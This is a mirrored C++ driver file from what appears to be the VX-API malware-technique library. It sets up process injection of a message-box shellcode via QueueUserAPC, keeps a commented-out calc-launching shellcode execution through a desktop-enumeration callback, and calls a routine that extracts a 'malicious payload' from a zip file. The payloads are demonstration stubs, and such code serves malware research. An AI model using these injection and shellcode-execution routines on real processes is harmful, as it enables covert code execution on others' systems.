mirror of
https://github.com/vxunderground/VX-API
synced 2026-06-06 16:54:55 +00:00
0f0f9aab4c
2.0.521
30 lines
770 B
C++
30 lines
770 B
C++
#include "Win32Helper.h"
|
|
|
|
INT main(VOID)
|
|
{
|
|
DWORD dwError = ERROR_SUCCESS;
|
|
PBYTE Buffer = NULL;
|
|
|
|
/*SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
|
Sei.Payload = (LPBYTE)GenericShellcodeOpenCalcExitThread();
|
|
Sei.dwLengthOfPayloadInBytes = 277;
|
|
Sei.MethodEnum = E_ENUMDESKTOPSW;
|
|
DWORD dwX = 0;*/
|
|
|
|
PROCESS_INJECTION_INFORMATION Pii = { 0 };
|
|
|
|
Pii.Payload = (LPBYTE)GenericShellcodeHelloWorldMessageBoxAEbFbLoop();
|
|
Pii.dwLengthOfPayloadInBytes = 70;
|
|
Pii.ProcessId = 33176;
|
|
Pii.ThreadId = 18600;
|
|
Pii.MethodEnum = E_QUEUE_USER_APC;
|
|
|
|
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
|
//ProcessInjectionMain(&Pii);
|
|
|
|
MpfExtractMaliciousPayloadFromZipFileW((PWCHAR)L"C:\\Users\\dwThr\\Desktop\\Test.zip", (PWCHAR)L"C:\\Users\\dwThr\\Desktop\\");
|
|
|
|
return dwError;
|
|
}
|
|
|